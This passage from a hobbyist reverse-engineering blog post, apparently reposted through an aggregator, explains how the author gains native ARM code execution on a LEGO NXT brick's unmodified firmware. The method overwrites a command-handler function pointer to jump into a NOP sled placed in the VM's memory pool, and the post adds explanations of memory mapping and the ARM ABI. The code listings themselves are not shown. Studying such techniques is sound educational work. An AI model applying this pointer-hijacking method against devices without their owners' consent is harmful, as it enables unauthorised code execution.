Instead of turning the response into a bytes object, we leave it as an array. In order to find the “actual data” which was read, we can either manually count all the bytes again, or we can realize that the data is going to be the last 4 bytes: [61, 13, 16, 0]. The final line of code converts this into the value of 0x100d3d. This is our function pointer, but what does this number mean?
If we look at the datasheet for the AT91SAM7S256 microcontroller and look at Figure 8-1 “SAM7S512/256/128/64/321/32/161/16 Memory Mapping”, we can see that memory addresses in the range 0x001xxxxx correspond to the internal flash memory of the chip. The value that we read, 0x100d3d, is 0xd3d bytes or about 3 KiB past the beginning of the internal flash memory. This certainly looks like a reasonable function pointer! If we modify this function pointer, we should be able to redirect code execution for “direct” commands to something else.
What, specifically, can we modify this pointer to in order to gain arbitrary code execution? On a modern system with memory protections and advanced exploit mitigations, this part of the puzzle may end up being a challenging task. However, this microcontroller has none of these features. We should be able to put in any valid address and have the microcontroller execute that address as code (as long as we’ve put valid code there).
How do you “put valid code somewhere”? What does that actually mean?
Many modern computers are designed so that the computer’s instructions can be accessed and manipulated as data. Likewise, data can be treated as instructions. This is certainly the case for the microcontroller in question here. This idea is critically important. It means that, as long as we can put some data in some location, and as long as that data happens to represent valid instructions, the CPU will be able to execute it.
This is not the case on every system. For example, the AVR architecture does not treat instruction memory and data memory as interchangeable. Modern operating systems such as Windows or Android also typically prevent accessing data as instructions (often called or ) without going through some extra steps. This helps protect against… exactly what we’re doing here.
The fact that we have a simple target which can freely interchange data and code and which doesn’t have modern protections makes this an excellent learning target.
What addresses can we actually modify the function pointer to? We don’t know what the code looks like (that’s the whole point of this exercise!), and we don’t know precisely how the data memory is laid out either. We can only put in one address, so what do we do?
Here’s where we get very lucky.
Inside the VM’s IO-Map, there is a MemoryPool variable corresponding to the data segment of the running NXT program. This variable is 32 KiB in size, which means that we have 32 KiB of space that we can safely fill with whatever we want (as long as no program is running).
That means that the firmware will not crash if we modify or corrupt the memory pool, since it doesn’t get accessed if no user program is running.
The NXT’s microcontroller has a total of 64 KiB of RAM. Observe that 32 KiB is half of that total. If we assume that the firmware lays out RAM starting from the lowest address and going up, and that the firmware uses more than 0 bytes of RAM (both very reasonable assumptions), there is no possible location the firmware could put this memory pool that doesn’t intersect with the address 32 KiB past the start of RAM, 0x00208000.
Since we don’t know exactly where the buffer sits in RAM, we can fill the initial part of the buffer with nop (no operation) instructions. We put our exploit code at the very end of the buffer. As long as 0x00208000 isn’t too close to the end of the memory pool, it will end up pointing somewhere in the pile of nops.
If we cause the CPU to jump to this address, the CPU will keep executing the nops until it finally hits our code. This exploitation technique is called a “NOP slide” or “NOP sled”.
In order to test this out, we need to build a bunch of scaffolding:
This code invokes an ARM assembler to assemble code written in nxtpwn.s into binary data, fills most of the MemoryPool with nops, and then writes the assembled code at the end.
You will need to somehow install a copy of GCC and Binutils targeting ARM. Any reasonable version should do, but this is also part of “environment setup”.
To test this, we can write the most basic assembly code in nxtpwn.s:
This is an empty function which doesn’t do anything. If we redirect the direct command handler to it, all direct commands should stop working.
How do you learn ARM assembly language?
I personally learned ARM assembly from this tutorial a long time ago. I generally think of “learning assembly” as consisting of at least two parts: learning how all CPUs work at a high level, and learning how one particular CPU architecture works.
For the first part, I started by learning x86 assembly in order to hack PC software. It’s also possible to learn from “academic” computer science materials, including free curricula focused around the RISC-V architecture. Here is an example of one I have found. It is also possible to learn this by doing retrocomputing for historical 8-bit computer systems, although those will have more differences from modern CPUs.
Given sufficient familiarity with the basics of CPUs, it’s possible to study and understand documentation specific to ARM or another architecture. Looking at the output of a C compiler really helps to build familiarity and experience.
We can use python3 -i nxtpwn.py to load the exploit code before dropping us into the Python REPL.
Before we actually trigger the exploit, let’s try running a “direct” command to make sure it works:
This should make the NXT beep.
To trigger the exploit, we can enter the following:
This replaces that pRCHandler function pointer with an address in RAM as described above. Now let’s try to make the NXT beep again:
This time the NXT doesn’t beep (because we’ve replaced the function which handles direct commands with an empty function) and returns different (garbage) data (because our empty function doesn’t set the output length properly either).
We have successfully achieved native ARM code execution on the NXT, on an unmodified firmware. This means that we are now free from all of the restrictions the firmware normally imposes.
Native code execution means we can access any data inside the microcontroller, including the firmware. To actually access it, we need to replace the direct command handler with a function which lets us read arbitrary memory addresses. The direct command handler turns out to be an excellent location to hijack because it is already hooked up to all the infrastructure needed to communicate to and from the PC. This greatly simplifies the work we need to do.
In the firmware source code, we can see that the original command handler normally takes three arguments: the input buffer, the output buffer, and a pointer to the length of the output. According to the ARM , these values will be stored in CPU registers r0, r1, and r2 respectively.
That function is written in C. How can you replace it with a function written in assembly? What is an ABI??
C code is turned into assembly code by a compiler. If we’re not using a compiler, we can still write assembly code by hand.
When a C compiler turns code into assembly, it has to follow certain conventions in order for different parts of the program to work together properly. For example, code which needs to make a function call needs to agree with the function being called about where to put the function arguments. This information (as well as lots of other stuff we don’t care about right now) is specified as part of the ABI.
Because the ARM architecture is a architecture with comparatively “many” CPU registers, functions with 4 or fewer arguments ≤ 32 bits in size will have the arguments placed into registers r0-r3.
As long as our assembly code follows the same conventions as the C code (follows the ABI), the existing firmware can call our code with no problems.
...
Read the original on arcanenibble.github.io »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.